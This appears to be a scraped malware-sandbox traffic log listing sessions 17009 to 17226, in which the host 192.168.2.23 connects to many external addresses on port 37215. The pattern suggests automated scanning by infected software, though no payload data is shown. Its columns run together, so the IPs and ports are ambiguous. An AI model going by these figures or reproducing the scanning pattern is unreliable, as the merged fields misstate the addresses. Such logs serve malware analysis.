                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17009192.168.2.2345906157.16.66.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17010192.168.2.2349102197.200.137.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17011192.168.2.2336404197.104.59.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17012192.168.2.2356112157.86.165.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17013192.168.2.2346118197.188.8.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17014192.168.2.2339196197.112.224.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17015192.168.2.2356482125.194.189.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17016192.168.2.233431641.141.94.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17017192.168.2.2342550197.190.195.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17018192.168.2.235164890.190.93.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17019192.168.2.2336364157.27.134.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17020192.168.2.2335166144.215.236.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17021192.168.2.2344256157.90.100.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17022192.168.2.234072241.214.129.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17023192.168.2.2347776157.51.21.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17024192.168.2.2333464157.247.31.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17025192.168.2.2342246117.150.9.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17026192.168.2.2347280157.72.89.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17027192.168.2.235018441.23.251.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17028192.168.2.2356744157.161.95.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17029192.168.2.2345000157.110.199.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17030192.168.2.234987441.135.226.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17031192.168.2.2345450157.56.118.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17032192.168.2.2343610197.165.189.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17033192.168.2.235833843.107.1.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17034192.168.2.233975841.162.226.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17035192.168.2.2360900222.97.48.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17036192.168.2.2356126157.68.30.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17037192.168.2.234459841.0.49.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17038192.168.2.2360096143.221.46.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17039192.168.2.2349242129.149.119.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17040192.168.2.2348124157.35.25.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17041192.168.2.2343614212.244.191.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17042192.168.2.2340234157.189.125.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17043192.168.2.2336348157.239.219.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17044192.168.2.2342668197.214.77.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17045192.168.2.2352966157.249.176.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17046192.168.2.233972041.253.70.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17047192.168.2.2360430157.91.254.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17048192.168.2.236080236.151.251.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17049192.168.2.234522841.52.44.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17050192.168.2.2340054181.241.17.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17051192.168.2.2336622157.41.167.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17052192.168.2.2354104197.111.63.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17053192.168.2.2344076197.166.118.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17054192.168.2.2338302187.194.234.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17055192.168.2.2335382197.231.127.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17056192.168.2.2339496197.102.247.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17057192.168.2.2349010158.224.192.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17058192.168.2.2359610157.177.60.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17059192.168.2.2359698157.14.3.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17060192.168.2.236021841.181.192.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17061192.168.2.234947479.9.233.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17062192.168.2.233994057.44.222.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17063192.168.2.234783841.22.251.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17064192.168.2.2358954197.92.131.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17065192.168.2.2340766157.73.200.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17066192.168.2.2341772157.53.85.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17067192.168.2.2359318166.199.77.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17068192.168.2.2338894157.199.110.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17069192.168.2.2351254197.6.103.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17070192.168.2.2353064218.174.7.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17071192.168.2.2344880157.71.226.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17072192.168.2.2341304157.194.219.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17073192.168.2.2335892157.199.1.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17074192.168.2.235358441.56.234.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17075192.168.2.2338464197.91.185.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17076192.168.2.233931041.253.144.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17077192.168.2.233783269.238.231.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17078192.168.2.235111241.86.89.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17079192.168.2.233973296.2.152.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17080192.168.2.2360718197.16.255.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17081192.168.2.2347120157.104.23.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17082192.168.2.235389241.154.112.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17083192.168.2.234679041.125.218.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17084192.168.2.2346408165.142.189.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17085192.168.2.2356502157.184.176.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17086192.168.2.2336528197.16.12.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17087192.168.2.2337490157.237.229.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17088192.168.2.2345792197.44.130.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17089192.168.2.2353096124.168.26.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17090192.168.2.2356580157.179.245.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17091192.168.2.2334780197.222.202.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17092192.168.2.2355056137.210.218.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17093192.168.2.2349140157.177.68.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17094192.168.2.2334128157.71.244.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17095192.168.2.2339620157.134.220.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17096192.168.2.233346641.30.84.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17097192.168.2.2356880157.150.76.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17098192.168.2.235613069.22.241.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17099192.168.2.233804041.182.208.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17100192.168.2.2353408157.135.40.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17101192.168.2.2341218157.148.219.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17102192.168.2.2355706197.240.65.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17103192.168.2.2337074197.194.22.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17104192.168.2.2351274102.180.67.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17105192.168.2.2348564157.123.190.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17106192.168.2.234457641.129.189.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17107192.168.2.2340296197.141.210.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17108192.168.2.2347138157.0.41.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17109192.168.2.2350700197.168.3.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17110192.168.2.234638069.172.168.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17111192.168.2.2354874157.15.255.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17112192.168.2.2344610157.186.128.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17113192.168.2.2348622157.108.194.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17114192.168.2.2354044157.135.187.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17115192.168.2.234004641.194.153.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17116192.168.2.2348822197.226.27.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17117192.168.2.2339964197.93.234.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17118192.168.2.2357894197.143.102.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17119192.168.2.2340216157.35.181.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17120192.168.2.2350874166.204.32.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17121192.168.2.2344500197.59.69.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17122192.168.2.233802075.117.123.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17123192.168.2.2344910157.104.3.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17124192.168.2.2336388181.196.87.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17125192.168.2.2359038157.211.227.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17126192.168.2.2334864163.117.219.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17127192.168.2.2334962197.28.167.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17128192.168.2.2340468197.195.113.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17129192.168.2.2340100197.82.93.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17130192.168.2.234936841.96.54.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17131192.168.2.2352126157.107.202.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17132192.168.2.235092641.93.43.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17133192.168.2.233553617.38.25.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17134192.168.2.2345652141.147.48.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17135192.168.2.235975241.79.214.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17136192.168.2.2349396157.225.81.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17137192.168.2.2336248178.210.149.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17138192.168.2.2353302157.173.187.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17139192.168.2.234242841.49.125.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17140192.168.2.234769241.34.168.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17141192.168.2.233758637.214.99.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17142192.168.2.2359992197.13.2.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17143192.168.2.2360428154.46.47.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17144192.168.2.233559041.230.88.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17145192.168.2.2351638197.166.250.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17146192.168.2.2346988171.167.5.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17147192.168.2.234237241.90.162.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17148192.168.2.2342846157.160.200.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17149192.168.2.2333262197.196.43.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17150192.168.2.2335754157.210.194.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17151192.168.2.2358606197.158.243.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17152192.168.2.2333972157.124.107.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17153192.168.2.234652241.108.184.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17154192.168.2.2342134197.144.126.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17155192.168.2.2339624197.141.106.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17156192.168.2.235610441.238.165.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17157192.168.2.235278241.174.173.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17158192.168.2.2342820157.193.176.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17159192.168.2.2351516157.38.249.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17160192.168.2.2334234197.63.87.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17161192.168.2.2358042197.46.64.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17162192.168.2.2338610197.172.230.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17163192.168.2.2357216197.101.24.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17164192.168.2.2356436197.69.218.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17165192.168.2.2334942157.140.38.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17166192.168.2.2339654205.224.252.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17167192.168.2.2351282157.77.133.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17168192.168.2.2346066102.53.236.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17169192.168.2.2336210197.255.121.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17170192.168.2.2359492157.202.20.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17171192.168.2.233919068.167.126.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17172192.168.2.235785038.165.0.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17173192.168.2.2338438157.104.92.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17174192.168.2.2356094197.170.236.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17175192.168.2.235104441.223.231.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17176192.168.2.2352206157.192.249.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17177192.168.2.233478041.178.239.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17178192.168.2.2351616157.204.151.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17179192.168.2.2336404197.169.55.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17180192.168.2.2342502197.21.68.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17181192.168.2.2346578197.205.120.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17182192.168.2.233884882.6.124.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17183192.168.2.235427641.98.14.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17184192.168.2.235569280.84.16.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17185192.168.2.235098093.63.142.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17186192.168.2.234521241.250.115.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17187192.168.2.2347264157.154.61.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17188192.168.2.2355860197.5.28.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17189192.168.2.23389445.241.6.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17190192.168.2.2354056157.129.140.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17191192.168.2.235303641.182.128.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17192192.168.2.2334104197.118.179.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17193192.168.2.2341966157.178.244.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17194192.168.2.2354910197.76.28.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17195192.168.2.2357506106.221.211.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17196192.168.2.235687420.69.219.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17197192.168.2.2350292157.242.47.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17198192.168.2.234287641.247.223.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17199192.168.2.236015241.239.137.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17200192.168.2.235565696.130.60.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17201192.168.2.234695241.35.203.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17202192.168.2.235064857.132.213.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17203192.168.2.2359814197.125.51.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17204192.168.2.2344384157.219.80.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17205192.168.2.2343160157.65.27.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17206192.168.2.2335058197.9.0.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17207192.168.2.2342286157.18.233.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17208192.168.2.2336444197.81.214.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17209192.168.2.234674445.93.226.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17210192.168.2.2351022197.192.197.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17211192.168.2.234901441.221.40.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17212192.168.2.234226841.119.250.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17213192.168.2.2355524197.199.142.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17214192.168.2.234134441.218.217.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17215192.168.2.2351172197.141.195.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17216192.168.2.2353492197.58.123.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17217192.168.2.234486041.2.199.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17218192.168.2.2357552157.198.113.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17219192.168.2.235981041.204.167.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17220192.168.2.2347616197.52.55.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17221192.168.2.2336684157.173.244.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17222192.168.2.2343658197.143.43.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17223192.168.2.2360922157.201.216.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17224192.168.2.2345334157.154.104.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17225192.168.2.235855049.104.46.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17226192.168.2.2336658157.87.17.12837215
                                          TimestampBytes transferredDirectionData


